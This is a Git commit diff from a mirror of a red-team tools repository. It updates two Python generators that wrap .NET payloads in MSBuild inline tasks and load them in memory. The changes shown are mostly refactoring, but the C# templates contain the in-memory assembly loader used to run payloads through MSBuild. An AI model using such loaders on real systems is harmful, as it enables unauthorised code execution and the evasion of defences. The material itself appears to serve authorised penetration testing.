Git
/
mgeeky-Penetration-Testing-Tools
mirror of https://github.com/mgeeky/Penetration-Testing-Tools.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Updated generateMSBuildXML.py and generateRogueDotNet.py

This commit is contained in:
mgeeky 2021-01-20 09:24:47 -08:00
parent 620b80d2d3
commit 01e2fa3643
2 changed files with 32 additions and 43 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

44
red-teaming/generateMSBuildXML.py
View File

@ -22,6 +22,7 @@ import sys
import gzip import gzip
import base64 import base64
import string import string
import pefile
import struct import struct
import random import random
import binascii import binascii
@ -83,10 +84,16 @@ def getInlineTask(module, payload, _format, apc, targetProcess):
<Reference Include="System.Management.Automation" /> <Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs"> <Code Type="Class" Language="cs">
<![CDATA[ <![CDATA[
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
using System;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.InteropServices;
using System.IO; using System.IO;
using System.IO.Compression; using System.IO.Compression;
using System;
using System.Reflection;
using System.Text; using System.Text;
public class $templateName : Task { public class $templateName : Task {
@ -113,14 +120,15 @@ def getInlineTask(module, payload, _format, apc, targetProcess):
Assembly asm = Assembly.Load(payload); Assembly asm = Assembly.Load(payload);
MethodInfo method = asm.EntryPoint; MethodInfo method = asm.EntryPoint;
object instance = asm.CreateInstance(method.Name); object instance = asm.CreateInstance(method.Name);
method.Invoke(instance, null); method.Invoke(instance, new object[] { new string[] { } });
return true; return true;
} }
} }
]]> ]]>
</Code> </Code>
</Task>''').safe_substitute( </Task>''').safe_substitute(
payloadCode = payloadCode payloadCode = payloadCode,
templateName = templateName
) )
launchCode = exeLaunchCode launchCode = exeLaunchCode
@ -143,7 +151,7 @@ def getInlineTask(module, payload, _format, apc, targetProcess):
using System.Runtime.InteropServices; using System.Runtime.InteropServices;
using System.IO; using System.IO;
using System.IO.Compression; using System.IO.Compression;
using System.Text; using System.Text;
public class $templateName : Task { public class $templateName : Task {
@ -489,26 +497,12 @@ def getInlineTask(module, payload, _format, apc, targetProcess):
return template return template
def detectFileIsExe(filePath, forced = False): def detectFileIsExe(filePath, forced = False):
first1000 = [] try:
pe = pefile.PE(filePath)
with open(filePath, 'rb') as f: return True
first1000 = f.read()[:1000] except pefile.PEFormatError as e:
if not (first1000[0] == 'M' and first1000[1] == 'Z'):
return False return False
elfanew = struct.unpack('<H', first1000[0x3c:0x3c + 2])[0]
if not (first1000[elfanew + 0] == 'P' and first1000[elfanew + 1] == 'E'):
return False
dosStub = "This program cannot be run in DOS mode."
printables = ''.join([x for x in first1000[0x40:] if x in string.printable])
#if not dosStub in printables:
# return False
return True
def minimize(output): def minimize(output):
output = re.sub(r'\s*\<\!\-\- .* \-\-\>\s*\n', '', output) output = re.sub(r'\s*\<\!\-\- .* \-\-\>\s*\n', '', output)
output = output.replace('\n', '') output = output.replace('\n', '')
@ -601,6 +595,10 @@ def main(argv):
_format = 'powershell' _format = 'powershell'
if len(args.inputFile) > 0 and not os.path.isfile(args.inputFile):
sys.stderr.write('[?] Input file does not exists.\n\n')
return False
if args.exe: if args.exe:
if not detectFileIsExe(args.inputFile, args.exe): if not detectFileIsExe(args.inputFile, args.exe):
sys.stderr.write('[?] File not recognized as PE/EXE.\n\n') sys.stderr.write('[?] File not recognized as PE/EXE.\n\n')

31
red-teaming/rogue-dot-net/generateRogueDotNet.py
View File

@ -47,6 +47,7 @@ import string
import struct import struct
import random import random
import binascii import binascii
import pefile
import argparse import argparse
import tempfile import tempfile
import subprocess import subprocess
@ -236,8 +237,8 @@ def getSourceFileContents(
Assembly asm = Assembly.Load(payload); Assembly asm = Assembly.Load(payload);
MethodInfo method = asm.EntryPoint; MethodInfo method = asm.EntryPoint;
object instance = asm.CreateInstance(method.Name); object instance = asm.CreateInstance(method.Name);
method.Invoke(instance, null); method.Invoke(instance, new object[] { new string[] { } });
return true;
} }
''').safe_substitute( ''').safe_substitute(
@ -662,26 +663,12 @@ $namespaceStop
return template, templateName return template, templateName
def detectFileIsExe(filePath, forced = False): def detectFileIsExe(filePath, forced = False):
first1000 = [] try:
pe = pefile.PE(filePath)
with open(filePath, 'rb') as f: return True
first1000 = f.read()[:1000] except pefile.PEFormatError as e:
if not (first1000[0] == 'M' and first1000[1] == 'Z'):
return False return False
elfanew = struct.unpack('<H', first1000[0x3c:0x3c + 2])[0]
if not (first1000[elfanew + 0] == 'P' and first1000[elfanew + 1] == 'E'):
return False
dosStub = "This program cannot be run in DOS mode."
printables = ''.join([x for x in first1000[0x40:] if x in string.printable])
#if not dosStub in printables:
# return False
return True
def opts(argv): def opts(argv):
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <inputFile|cmdline>') parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <inputFile|cmdline>')
@ -727,6 +714,10 @@ def main(argv):
_format = 'powershell' _format = 'powershell'
if len(args.inputFile) > 0 and not os.path.isfile(args.inputFile):
sys.stderr.write('[?] Input file does not exists.\n\n')
return False
if args.type not in ['exec', 'run-command']: if args.type not in ['exec', 'run-command']:
if args.exe: if args.exe:
if not detectFileIsExe(args.inputFile, args.exe): if not detectFileIsExe(args.inputFile, args.exe):